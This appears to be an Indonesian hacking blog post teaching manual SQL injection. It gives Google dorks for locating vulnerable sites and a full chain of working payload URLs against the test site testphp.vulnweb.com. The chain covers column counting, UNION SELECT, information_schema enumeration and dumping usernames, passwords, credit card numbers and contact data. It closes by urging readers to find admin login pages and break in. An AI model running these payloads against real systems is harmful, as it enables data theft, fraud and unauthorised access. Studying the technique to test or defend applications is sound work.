-->

Tutorial SQL Injection Manual

Apa itu SQL Injection ?
Injeksi SQL (Bahasa Inggris: SQL Injection)adalah sebuah teknik yang menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi. Celah ini terjadi ketika masukan pengguna tidak disaring secara benar dari karakter-karakter pelolos bentukan string yang diimbuhkan dalam pernyataan SQL atau masukan pengguna tidak bertipe kuat dan karenanya dijalankan tidak sesuai harapan. Ini sebenarnya adalah sebuah contoh dari sebuah kategori celah keamanan yang lebih umum yang dapat terjadi setiap kali sebuah bahasa pemrograman atau skrip diimbuhkan di dalam bahasa pemrograman lain. (Wikipedia)
Baca Juga : Hacker dan Cracker itu Berbeda!
Kali ini saya akan memberikan Tutorial SQL Injection Manual.
A : Tutorialnya bisa dijalanin di Smartphone ga ?
B : PC / Smartphone bisa melakukan cara ini.

*Jika text tidak muat di smartphone maka coba untuk merubah rotasi smartphone kalian menjadi Horizontal

Langsung saja...

Beberapa Dork SQLi :

inurl:.php?catid=
inurl:about.php?id=
inurl:news.php?catId=
inurl:info.php?cat=
inurl:index.php?itemid=

*Tinggal di kreasikan sendiri.

1.  Contoh Target : http://testphp.vulnweb.com/listproducts.php?cat=1
Tinggal kita tambahkan tanda (') di akhir URL, maka hasilnya seperti ini, http://testphp.vulnweb.com/listproducts.php?cat=1'

Jika ada Text/Img yang error maka tandanya itu vuln
A : Bagaimana jika tidak ada yang error ?
B : Yaa berarti tidak vuln / gunakan Bypass WAF (Akan dibahas dilain artikel)

Contoh Text/Image yang error

2. Jika sudah maka kita buat (+order+by+1--) untuk melihat columns yang tersedia.

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1--
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+2--
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+3--
..
.. (Skip)
..
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12--


3. Gambar diatas adalah columns angka 12 tidak ada berarti hanya sampai 11
Next ? kita lakukan (+union+all+select+angka,angka,angka--)

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,9,10,11--
(Hanya sampai angka 11 ? ya lah kan tadi columns angka 12 tidak ada berarti hanya sampai 11, bagaimana dengan site yang lain ? ya tinggal ikuti saja, misalkan kalian tidak menemukan columns angka 19 berarti hanya sampai 18, paham kan ?).

4. Lalu kita cari angka ajaib, bingung ? lihat gambar dibawah.


Kita menemukan angka 7 - 2 - 9, angka togel xD , Selanjutnya kita cek versionnya ( @@version / version() ) pada angka 7 / 2 / 9, saya memakai angka 9

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,version(),10,11--

http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,@@version,10,11--

Cara diatas sama hanya beda tulisan.

5. Selanjutnya gimana ? ya kita cek table yang tersedia, begini nih.

*Tambahkan, group_concat(table_name) pada angka 9 tadi dan +from+information_schema.tables+where+table_schema=database()-- di akhir URL.

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,group_concat(table_name),10,11
+from+information_schema.tables+where+table_schema=database()--

Hingga menemukan tulisan seperti gambar dibawah ini.


6. Kita ambil columns users, gimana ? gini tong, tapi sebelum itu kita harus mengubah Text to Decimal seperti gambar dibawah ini.


Setelah itu kita ganti beberapa exploit menjadi seperti ini.

1. group_concat(column_name)

2. +from+information_schema.columns+where+table_name=CHAR(Text yg diubah menjadi Decimal)--

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,group_concat(column_name),10,11
+from+information_schema.columns+where+table_name=CHAR(117,115,101,114,115)--

*Jangan lupa untuk menambahkan (,) koma di setiap angka.

7. Yaps kita mendapatkan columns "uname,pass,cc,address,email,name,phone,cart"
Tinggal kita dump dan ubah beberapa exploit yang tadi.

1. group_concat(text,0x3a,text,0x3a,text) *0x3a = Tanda titik 2 (:) jika tidak memakinya maka akan sulit untuk dilihat.

2. +from+table yang tadi--

Contoh :
http://testphp.vulnweb.com/listproducts.php?cat=1+union+all+select+1,2,3,4,5,6,7,8,
group_concat(uname,0x3a,pass,0x3a,cc,0x3a,address,0x3a,email,0x3a,name,0x3a,phone,0x3a,cart),10,11+from+users--

8. Wooooba xD


Dan kalian akan melihat "username,password,cc, dan table yang lainnya"
Selanjutnya ? tinggal kita cari login adminnya,..
A : Gimana ?
B : Cari sendiri tong, biasanya /admin - /sysadmin - /adminlogin

Contoh : site.com/admin (Ketemu ? Tinggal di eksekusi).

Itu dia Tutorial SQL Injection Manual, ada kesalahan kata ? kami mohon maaf ^_^

Baca Artikel Menarik Lainnya :
35+ eBook Tentang Hacking Gratis
Disqus Comments